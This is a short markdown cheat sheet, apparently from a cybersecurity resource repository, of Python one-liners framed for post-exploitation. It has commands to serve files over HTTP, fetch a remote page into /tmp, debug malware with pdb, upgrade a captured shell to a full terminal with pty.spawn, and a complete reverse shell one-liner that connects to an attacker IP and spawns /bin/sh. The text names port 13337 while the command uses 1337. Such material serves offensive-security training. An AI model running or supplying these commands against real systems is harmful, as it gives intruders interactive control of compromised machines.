cyber-security-resources/python_ruby_and_bash/python_cool_tricks.md
2019-03-31 13:34:48 -04:00

1.5 KiB

Cool Python Tricks

Starting a quick web server to serve some files (useful for post exploitation)

In Python 2.x

python -m SimpleHTTPServer 1337

In Python 3.x

python3 -m http.server 1337

Pythonic Web Client

In Python 2.x

python -c 'import urllib2; print urllib2.urlopen("http://h4cker.org/web").read()' | tee /tmp/file.html

In Python 3.x

python3 -c 'import urllib.request; urllib.request.urlretrieve ("http://h4cker.org/web","/tmp/h4cker.html")'

Python Debugger

This imports a Python file and runs the debugger automatically. This is useful for debugging Python-based malware and for post-exploitation.

python -m pdb <some_python_file>

Refer to this Python Debugger cheatsheet if you are not familiar with the Python Debugger.


Shell to Terminal

This is useful after exploitation and getting a shell. It allows you to use Linux commands that require a terminal session (e.g., su, sudo, vi, etc.)

python -c 'import pty; pty.spawn("/bin/bash")'

Using Python to do a Reverse Shell

You put your IP address (instead of 192.168.78.205) and the port (instead of 13337) below:

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.78.205",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'